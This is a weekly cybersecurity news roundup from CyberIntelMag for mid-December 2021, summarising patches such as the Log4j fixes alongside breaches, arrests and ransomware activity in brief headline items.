CyberIntelMag's Threat report

Weekly Cyber Threat Report, December 13 – December 17, 2021

Welcome to CyberIntelMag’s weekly roundup! A place where you can find the most important stories in the cybersecurity world from the past week.

From the good news:

This week’s good news includes Minecraft getting the Log4j flaw fixed, Ukraine detaining 51 people for selling data of 300 million US and EU citizens, CISA urging for constant attacks lookout, Adobe addressing more than 60 flaws in multiple apps, SAP fixing Log4Shell flaw in 20 programs, and much more.

  • Mojang Studios released a critical Minecraft security update to fix a significant flaw in the Apache Log4j Java logging library used by the Java Edition client and multiplayer servers.
  • Ukraine’s police forces arrested 51 individuals accused of selling stolen personal data of millions of people on hacker forums. Over 300 million people from Europe, Ukraine, and the US were affected.
  • Adobe issued urgent alerts for over 60 flaws in its Windows and macOS-based applications. Threat actors can exploit them for code execution, privilege escalation, and denial-of-service attacks.
  • Google has released an emergency Chrome update 96.0.4664.110 for Windows, Linux, and Mac. This update will resolve a high-severity zero-day vulnerability being exploited in the wild.
  • CISA has alerted critical infrastructure businesses to strengthen their cybersecurity defenses against upcoming and ongoing attacks. They were encouraged to evaluate the CISA Insights and adopt a higher level of awareness.
  • Google has simplified stopping the addition of unauthorized calendar invitations to Google calendar. It’s a big setback for threat actors because they were frequently employing them in phishing and criminal activities.
  • SAP discovered 32 apps impacted by CVE-2021-44228, a major flaw in the Apache Log4j Java-based logging tool, and has already released fixes for 20 of them, with the other 12 being fixed as soon as feasible.


From the bad news:

This week’s bad news includes the use of QR codes to steal banking details, cyber attackers attempting to abuse Log4j vulnerability, attackers being able to gain root access by crashing Ubuntu’s AccountsService, WiFi chips including flaws that can be used for a data breach, FBI accidentally revealing the HelloKitty ransomware gang’s operation base, Virginia Museum shutting down its website, and others.

  • A novel phishing attempt aiming at German e-banking clients is active and employs QR codes in this credential-snatching process. Malicious actors use various approaches to get past security barriers and execute instructions.
  • A third party accessed one file repository of Volvo Cars unlawfully. This hack resulted in the loss of sensitive data but didn’t affect its customers’ automobiles or personal data safety or security.
  • By attacking a device’s Bluetooth component, researchers uncovered flaws in WiFi chips that may be used to steal passwords and control traffic.
  • Cyber attackers are aggressively attempting to abuse a severe flaw in the Java logging library Apache Log4j. Found on December 9, this flaw can provide illegal remote code execution and access to systems.
  • Using a double-free memory corruption vulnerability, attackers can get root access to Ubuntu workstations by exploiting a local privilege escalation security weakness in GNOME’s AccountsService component.
  • The FBI mistakenly divulged that it believes the HelloKitty ransomware group operates out of Ukraine while investigating a data breach at an Oregon-based healthcare firm.
  • IBM Security X-Force found that an attack on one of the Asian airlines in March 2021 was likely carried out by a state-sponsored adversary using a new Slack-based backdoor.
  • Now in time for holidays, the dreaded Emotet malware has resurfaced and is ready to infect systems. Threat actors use cobalt Strike beacons to spread laterally through a network, steal data, and transmit malware.
  • The Virginia Museum of Fine Arts had to take down its website for a state inquiry after a security compromise was discovered late last month. There’s no proof that any personal or financial data was accessed or exploited.
  • The Conti ransomware gang is abusing the severe Log4Shell vulnerability to gain access to internal VMware vCenter Server instances and encrypt virtual machines.

About the author

CIM Team

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.